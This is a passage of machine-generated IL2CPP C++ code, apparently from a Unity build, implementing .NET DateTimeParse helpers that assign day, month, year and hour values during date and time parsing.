DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_18 = ___result0; int32_t* L_19 = L_18->get_address_of_flags_8(); int32_t* L_20 = L_19; int32_t L_21 = *((int32_t*)L_20); *((int32_t*)L_20) = (int32_t)((int32_t)((int32_t)L_21|(int32_t)((int32_t)128))); return (bool)1; } IL_0062: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_22 = ___result0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_23 = ___raw1; int32_t L_24 = L_23->get_year_3(); int32_t L_25 = V_0; int32_t L_26 = V_1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_27 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_22, L_24, L_25, L_26, /*hidden argument*/NULL); if (!L_27) { goto IL_0083; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_28 = ___result0; int32_t* L_29 = L_28->get_address_of_flags_8(); int32_t* L_30 = L_29; int32_t L_31 = *((int32_t*)L_30); *((int32_t*)L_30) = (int32_t)((int32_t)((int32_t)L_31|(int32_t)((int32_t)128))); return (bool)1; } IL_0083: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_32 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_32, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } } // System.Boolean System.DateTimeParse::GetDayOfNNY(System.DateTimeResult&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfNNY_mD619397E2B7F801D2F569CA91D5878742C2FD825 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetDayOfNNY_mD619397E2B7F801D2F569CA91D5878742C2FD825_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; int32_t V_1 = 0; int32_t V_2 = 0; { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = L_0->get_flags_8(); if (!((int32_t)((int32_t)L_1&(int32_t)((int32_t)128)))) { goto IL_001d; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_2, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_001d: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_3 = ___raw1; int32_t L_4 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_3, 0, /*hidden argument*/NULL); V_0 = L_4; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_5 = ___raw1; int32_t L_6 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_5, 1, /*hidden argument*/NULL); V_1 = L_6; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_7 = ___dtfi2; String_t* L_8 = DateTimeFormatInfo_get_ShortDatePattern_m8CAB8ACB8B5C152FA767345BA59E8FE8C8B9A5FA(L_7, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_9 = ___dtfi2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_10 = DateTimeParse_GetYearMonthDayOrder_mE9CAC6C3BFC905C6A5FDFD5DD7A701935DF43776(L_8, L_9, (int32_t*)(&V_2), /*hidden argument*/NULL); if (L_10) { goto IL_0051; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_11 = ___result0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_12 = ___dtfi2; String_t* L_13 = DateTimeFormatInfo_get_ShortDatePattern_m8CAB8ACB8B5C152FA767345BA59E8FE8C8B9A5FA(L_12, /*hidden argument*/NULL); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_11, 3, _stringLiteralFB2D933A5A8BE5989BECD2E8F00EC57F9D995758, L_13, /*hidden argument*/NULL); return (bool)0; } IL_0051: { int32_t L_14 = V_2; if ((((int32_t)L_14) == ((int32_t)1))) { goto IL_0058; } } { int32_t L_15 = V_2; if (L_15) { goto IL_0079; } } IL_0058: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_16 = ___result0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_17 = ___raw1; int32_t L_18 = L_17->get_year_3(); int32_t L_19 = V_0; int32_t L_20 = V_1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_21 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_16, L_18, L_19, L_20, /*hidden argument*/NULL); if (!L_21) { goto IL_009a; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_22 = ___result0; int32_t* L_23 = L_22->get_address_of_flags_8(); int32_t* L_24 = L_23; int32_t L_25 = *((int32_t*)L_24); *((int32_t*)L_24) = (int32_t)((int32_t)((int32_t)L_25|(int32_t)((int32_t)128))); return (bool)1; } IL_0079: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_26 = ___result0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_27 = ___raw1; int32_t L_28 = L_27->get_year_3(); int32_t L_29 = V_1; int32_t L_30 = V_0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_31 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_26, L_28, L_29, L_30, /*hidden argument*/NULL); if (!L_31) { goto IL_009a; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_32 = ___result0; int32_t* L_33 = L_32->get_address_of_flags_8(); int32_t* L_34 = L_33; int32_t L_35 = *((int32_t*)L_34); *((int32_t*)L_34) = (int32_t)((int32_t)((int32_t)L_35|(int32_t)((int32_t)128))); return (bool)1; } IL_009a: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_36 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_36, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } } // System.Boolean System.DateTimeParse::GetDayOfYMN(System.DateTimeResult&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfYMN_m2E7DC88AEE18C162381DCC0F93043848A21B8B74 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetDayOfYMN_m2E7DC88AEE18C162381DCC0F93043848A21B8B74_MetadataUsageId); s_Il2CppMethodInitialized = true; } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = L_0->get_flags_8(); if (!((int32_t)((int32_t)L_1&(int32_t)((int32_t)128)))) { goto IL_001d; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_2, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_001d: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_3 = ___result0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_4 = ___raw1; int32_t L_5 = L_4->get_year_3(); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_6 = ___raw1; int32_t L_7 = L_6->get_month_2(); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_8 = ___raw1; int32_t L_9 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_8, 0, /*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_10 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_3, L_5, L_7, L_9, /*hidden argument*/NULL); if (!L_10) { goto IL_0049; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_11 = ___result0; int32_t* L_12 = L_11->get_address_of_flags_8(); int32_t* L_13 = L_12; int32_t L_14 = *((int32_t*)L_13); *((int32_t*)L_13) = (int32_t)((int32_t)((int32_t)L_14|(int32_t)((int32_t)128))); return (bool)1; } IL_0049: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_15 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_15, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } } // System.Boolean System.DateTimeParse::GetDayOfYN(System.DateTimeResult&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfYN_m0AE142EC90410897271ECB3ACBA4D62466DF5436 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetDayOfYN_m0AE142EC90410897271ECB3ACBA4D62466DF5436_MetadataUsageId); s_Il2CppMethodInitialized = true; } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = L_0->get_flags_8(); if (!((int32_t)((int32_t)L_1&(int32_t)((int32_t)128)))) { goto IL_001d; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_2, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_001d: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_3 = ___result0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_4 = ___raw1; int32_t L_5 = L_4->get_year_3(); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_6 = ___raw1; int32_t L_7 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_6, 0, /*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_8 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_3, L_5, L_7, 1, /*hidden argument*/NULL); if (!L_8) { goto IL_0044; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_9 = ___result0; int32_t* L_10 = L_9->get_address_of_flags_8(); int32_t* L_11 = L_10; int32_t L_12 = *((int32_t*)L_11); *((int32_t*)L_11) = (int32_t)((int32_t)((int32_t)L_12|(int32_t)((int32_t)128))); return (bool)1; } IL_0044: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_13 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_13, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } } // System.Boolean System.DateTimeParse::GetDayOfYM(System.DateTimeResult&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfYM_m7ED25D38684B48D3985BF08AA31115253AF47805 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetDayOfYM_m7ED25D38684B48D3985BF08AA31115253AF47805_MetadataUsageId); s_Il2CppMethodInitialized = true; } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = L_0->get_flags_8(); if (!((int32_t)((int32_t)L_1&(int32_t)((int32_t)128)))) { goto IL_001d; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_2, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_001d: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_3 = ___result0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_4 = ___raw1; int32_t L_5 = L_4->get_year_3(); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_6 = ___raw1; int32_t L_7 = L_6->get_month_2(); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_8 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_3, L_5, L_7, 1, /*hidden argument*/NULL); if (!L_8) { goto IL_0043; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_9 = ___result0; int32_t* L_10 = L_9->get_address_of_flags_8(); int32_t* L_11 = L_10; int32_t L_12 = *((int32_t*)L_11); *((int32_t*)L_11) = (int32_t)((int32_t)((int32_t)L_12|(int32_t)((int32_t)128))); return (bool)1; } IL_0043: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_13 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_13, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } } // System.Void System.DateTimeParse::AdjustTimeMark(System.Globalization.DateTimeFormatInfo,System.DateTimeRawInfo&) extern "C" IL2CPP_METHOD_ATTR void DateTimeParse_AdjustTimeMark_mB9686C681235D376DDE453471FFCC72C9B7DDC6E (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, const RuntimeMethod* method) { { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_0 = ___raw1; int32_t L_1 = L_0->get_timeMark_6(); if ((!(((uint32_t)L_1) == ((uint32_t)(-1))))) { goto IL_005b; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_2 = ___dtfi0; String_t* L_3 = DateTimeFormatInfo_get_AMDesignator_m3F6101B15CF9711362B92B7827F29BC8589EEC13(L_2, /*hidden argument*/NULL); if (!L_3) { goto IL_005b; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_4 = ___dtfi0; String_t* L_5 = DateTimeFormatInfo_get_PMDesignator_m9B249FB528D588F5B6AEFA088CEF342DEDF8594D(L_4, /*hidden argument*/NULL); if (!L_5) { goto IL_005b; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_6 = ___dtfi0; String_t* L_7 = DateTimeFormatInfo_get_AMDesignator_m3F6101B15CF9711362B92B7827F29BC8589EEC13(L_6, /*hidden argument*/NULL); int32_t L_8 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_7, /*hidden argument*/NULL); if (L_8) { goto IL_003a; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_9 = ___dtfi0; String_t* L_10 = DateTimeFormatInfo_get_PMDesignator_m9B249FB528D588F5B6AEFA088CEF342DEDF8594D(L_9, /*hidden argument*/NULL); int32_t L_11 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_10, /*hidden argument*/NULL); if (!L_11) { goto IL_003a; } } { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_12 = ___raw1; L_12->set_timeMark_6(0); } IL_003a: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_13 = ___dtfi0; String_t* L_14 = DateTimeFormatInfo_get_PMDesignator_m9B249FB528D588F5B6AEFA088CEF342DEDF8594D(L_13, /*hidden argument*/NULL); int32_t L_15 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_14, /*hidden argument*/NULL); if (L_15) { goto IL_005b; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_16 = ___dtfi0; String_t* L_17 = DateTimeFormatInfo_get_AMDesignator_m3F6101B15CF9711362B92B7827F29BC8589EEC13(L_16, /*hidden argument*/NULL); int32_t L_18 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_17, /*hidden argument*/NULL); if (!L_18) { goto IL_005b; } } { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_19 = ___raw1; L_19->set_timeMark_6(1); } IL_005b: { return; } } // System.Boolean System.DateTimeParse::AdjustHour(System.Int32&,System.DateTimeParse/TM) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_AdjustHour_mB41992E26807EE20E333ABBCD87EAA1F69024C56 (int32_t* ___hour0, int32_t ___timeMark1, const RuntimeMethod* method) { int32_t* G_B7_0 = NULL; int32_t* G_B6_0 = NULL; int32_t G_B8_0 = 0; int32_t* G_B8_1 = NULL; { int32_t L_0 = ___timeMark1; if ((((int32_t)L_0) == ((int32_t)(-1)))) { goto IL_003d; } } { int32_t L_1 = ___timeMark1; if (L_1) { goto IL_0023; } } { int32_t* L_2 = ___hour0; int32_t L_3 = *((int32_t*)L_2); if ((((int32_t)L_3) < ((int32_t)0))) { goto IL_0012; } } { int32_t* L_4 = ___hour0; int32_t L_5 = *((int32_t*)L_4); if ((((int32_t)L_5) <= ((int32_t)((int32_t)12)))) { goto IL_0014; } } IL_0012: { return (bool)0; } IL_0014: { int32_t* L_6 = ___hour0; int32_t* L_7 = ___hour0; int32_t L_8 = *((int32_t*)L_7); G_B6_0 = L_6; if ((((int32_t)L_8) == ((int32_t)((int32_t)12)))) { G_B7_0 = L_6; goto IL_001f; } } { int32_t* L_9 = ___hour0; int32_t L_10 = *((int32_t*)L_9); G_B8_0 = L_10; G_B8_1 = G_B6_0; goto IL_0020; } IL_001f: { G_B8_0 = 0; G_B8_1 = G_B7_0; } IL_0020: { *((int32_t*)G_B8_1) = (int32_t)G_B8_0; goto IL_003d; } IL_0023: { int32_t* L_11 = ___hour0; int32_t L_12 = *((int32_t*)L_11); if ((((int32_t)L_12) < ((int32_t)0))) { goto IL_002e; } } { int32_t* L_13 = ___hour0; int32_t L_14 = *((int32_t*)L_13); if ((((int32_t)L_14) <= ((int32_t)((int32_t)23)))) { goto IL_0030; } } IL_002e: { return (bool)0; } IL_0030: { int32_t* L_15 = ___hour0; int32_t L_16 = *((int32_t*)L_15); if ((((int32_t)L_16) >= ((int32_t)((int32_t)12)))) { goto IL_003d; } } { int32_t* L_17 = ___hour0; int32_t* L_18 = ___hour0; int32_t L_19 = *((int32_t*)L_18); *((int32_t*)L_17) = (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_19, (int32_t)((int32_t)12))); } IL_003d: { return (bool)1; } } // System.Boolean System.DateTimeParse::GetTimeOfN(System.Globalization.DateTimeFormatInfo,System.DateTimeResult&,System.DateTimeRawInfo&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetTimeOfN_m4240DB94AC85D67E2F15D3E01695908C5EF94075 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi0, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result1, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetTimeOfN_m4240DB94AC85D67E2F15D3E01695908C5EF94075_MetadataUsageId); s_Il2CppMethodInitialized = true; } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result1; int32_t L_1 = L_0->get_flags_8(); if (!((int32_t)((int32_t)L_1&(int32_t)((int32_t)64)))) { goto IL_001a; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result1; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_2, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_001a: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_3 = ___raw2; int32_t L_4 = L_3->get_timeMark_6(); if ((!(((uint32_t)L_4) == ((uint32_t)(-1))))) { goto IL_0032; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_5 = ___result1; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_5, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0032: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_6 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_7 = ___raw2; int32_t L_8 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_7, 0, /*hidden argument*/NULL); L_6->set_Hour_3(L_8); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_9 = ___result1; int32_t* L_10 = L_9->get_address_of_flags_8(); int32_t* L_11 = L_10; int32_t L_12 = *((int32_t*)L_11); *((int32_t*)L_11) = (int32_t)((int32_t)((int32_t)L_12|(int32_t)((int32_t)64))); return (bool)1; } } // System.Boolean System.DateTimeParse::GetTimeOfNN(System.Globalization.DateTimeFormatInfo,System.DateTimeResult&,System.DateTimeRawInfo&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetTimeOfNN_m8F29F972206C71BAA5EB4721AB5CAC6ACC987A02 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi0, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result1, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetTimeOfNN_m8F29F972206C71BAA5EB4721AB5CAC6ACC987A02_MetadataUsageId); s_Il2CppMethodInitialized = true; } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result1; int32_t L_1 = L_0->get_flags_8(); if (!((int32_t)((int32_t)L_1&(int32_t)((int32_t)64)))) { goto IL_001a; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result1; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_2, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_001a: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_3 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_4 = ___raw2; int32_t L_5 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_4, 0, /*hidden argument*/NULL); L_3->set_Hour_3(L_5); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_6 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_7 = ___raw2; int32_t L_8 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_7, 1, /*hidden argument*/NULL); L_6->set_Minute_4(L_8); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_9 = ___result1; int32_t* L_10 = L_9->get_address_of_flags_8(); int32_t* L_11 = L_10; int32_t L_12 = *((int32_t*)L_11); *((int32_t*)L_11) = (int32_t)((int32_t)((int32_t)L_12|(int32_t)((int32_t)64))); return (bool)1; } } // System.Boolean System.DateTimeParse::GetTimeOfNNN(System.Globalization.DateTimeFormatInfo,System.DateTimeResult&,System.DateTimeRawInfo&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetTimeOfNNN_m59D4D7BB0B637B9E549B9F91C0D7B96EE25BEABF (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi0, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result1, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetTimeOfNNN_m59D4D7BB0B637B9E549B9F91C0D7B96EE25BEABF_MetadataUsageId); s_Il2CppMethodInitialized = true; } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result1; int32_t L_1 = L_0->get_flags_8(); if 